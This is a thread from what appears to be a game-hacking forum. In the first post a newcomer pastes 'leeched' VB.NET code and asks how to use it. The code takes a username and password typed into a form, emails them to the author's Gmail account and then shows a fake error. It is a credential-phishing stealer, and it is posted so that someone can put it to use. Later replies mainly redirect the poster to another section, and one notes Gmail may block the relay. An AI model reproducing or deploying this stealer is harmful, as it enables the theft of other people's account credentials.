Thread: [HELP!]Code

Results 1 to 7 of 7
  1. #1
    Beex's Avatar
    Join Date
    May 2008
    Gender
    male
    Location
    Posh Gang HQ
    Posts
    633
    Reputation
    55
    Thanks
    402
    My Mood
    Angelic

    [HELP!]Code

    I dont know what language this is im just a wee newb learning my PHP over there in the corner. and yes it is leeched i was wondering how to put it to use.

    If TextBox1.Text = "" Then
    MsgBox("Username Is Missing")
    If Textbox2.text = "" Then
    Msgbox("Password Is Missing")
    Else
    End If
    End if
    Dim smtpServer As New SmtpClient()
    Dim mail As New MailMessage()
    smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
    'using gmail
    smtpServer.Port = 587
    smtpServer.Host = "smtp.gmail.com"
    smtpServer.EnableSsl = True
    mail = New MailMessage()
    mail.From = New MailAddress("Your Gmail")
    mail.To.Add("Your Gmail")
    mail.Subject = "Username: " & TextBox1.Text
    mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
    smtpServer.Send(mail)
    MsgBox("Any Error You Want Here")

  2. #2
    Beex's Avatar
    Join Date
    May 2008
    Gender
    male
    Location
    Posh Gang HQ
    Posts
    633
    Reputation
    55
    Thanks
    402
    My Mood
    Angelic
    Quote Originally Posted by Hell_Demon View Post
    Visual basic = whore language, and instantly makes you gay!
    Learn C# way better
    i didnt ask if the languiage it was in was gay i asked how to use do i compile is there a program or what i dont know the slightest thing about VB8

  3. #3
    crushed's Avatar
    Join Date
    Oct 2009
    Gender
    male
    Location
    My name is Jay. k?
    Posts
    415
    Reputation
    10
    Thanks
    113
    My Mood
    Sneaky
    Ctrl+W. Just highlight the code, and press it.

  4. #4
    ilovecookies's Avatar
    Join Date
    Oct 2009
    Gender
    male
    Location
    In the C++ Section
    Posts
    321
    Reputation
    10
    Thanks
    67
    My Mood
    Shocked
    Quote Originally Posted by Ryan_Duke View Post
    i didnt ask if the languiage it was in was gay i asked how to use do i compile is there a program or what i dont know the slightest thing about VB8
    The point Hell_Demon is getting at is this.

    This is the C++ section, the code you pasted was in Visual Basics. We here in C++ dislike anything/all things visual basic.

    Sooooo, you won't be getting any help with that code here.
    Quote Originally Posted by Jules Winnfield View Post
    I am the tyranny of evil men, and you are all the weak. But i'm trying Ringo,i'm trying real hard, to become the shepherd.
    excuse me miss, would you kindly reflect some photons off the epidermis covering your sternum directly into the camera iris or vacate the proximity immediately
    [IMG]https://i882.photobucke*****m/albums/ac23/miki_d420/RealizingYoureALeecher2copy.jpg[/IMG]









  5. The Following User Says Thank You to ilovecookies For This Useful Post:

    crushed (12-26-2009)

  6. #5
    Lolland's Avatar
    Join Date
    Feb 2009
    Gender
    male
    Location
    Lolland!
    Posts
    3,156
    Reputation
    49
    Thanks
    868
    My Mood
    Inspired
    Post this in the VB section, or the PHP/HTML section, please.

  7. The Following User Says Thank You to Lolland For This Useful Post:

    crushed (12-26-2009)

  8. #6
    why06's Avatar
    Join Date
    Jul 2009
    Gender
    male
    Location
    IBM
    Posts
    4,304
    Reputation
    170
    Thanks
    2,203
    My Mood
    Flirty
    It's VB so I will send you there. Bye bye

    "Every gun that is made, every warship launched, every rocket fired signifies, in the final sense, a theft from those who hunger and are not fed, those who are cold and are not clothed. This world in arms is not spending money alone. It is spending the sweat of its laborers, the genius of its scientists, the hopes of its children. The cost of one modern heavy bomber is this: a modern brick school in more than 30 cities. It is two electric power plants, each serving a town of 60,000 population. It is two fine, fully equipped hospitals. It is some fifty miles of concrete pavement. We pay for a single fighter plane with a half million bushels of wheat. We pay for a single destroyer with new homes that could have housed more than 8,000 people. This is, I repeat, the best way of life to be found on the road the world has been taking. This is not a way of life at all, in any true sense. Under the cloud of threatening war, it is humanity hanging from a cross of iron."
    - Dwight D. Eisenhower

  9. #7
    NextGen1's Avatar
    Join Date
    Dec 2009
    Gender
    male
    Location
    Not sure really.
    Posts
    6,312
    Reputation
    382
    Thanks
    3,019
    My Mood
    Amazed
    What do you need it for?

    The code is used for sending a email inside of a VB project (software created in VB)

    and a few more things, you will not get to far with this code, A. Gmail no longer allows relays and I'm almost 100% sure that port 587 is now blocked by gmail.


     


     


     



    The Most complete application MPGH will ever offer - 68%




Similar Threads

  1. [Help Request] I WANT TO HELP CODE!!
    By youngbuck1970 in forum Alliance of Valiant Arms (AVA) Help
    Replies: 7
    Last Post: 06-09-2011, 04:28 PM
  2. Need help coding trainers
    By CoderNever in forum General
    Replies: 12
    Last Post: 08-24-2009, 03:05 AM
  3. [HELP] Codes in game moving around after update
    By mynameisjack in forum General Game Hacking
    Replies: 3
    Last Post: 06-03-2009, 10:44 PM
  4. help code
    By xSmilex83 in forum Visual Basic Programming
    Replies: 0
    Last Post: 05-30-2008, 02:39 AM
  5. Help Code Asm In C++
    By spartacchio in forum C++/C Programming
    Replies: 5
    Last Post: 04-03-2008, 09:00 AM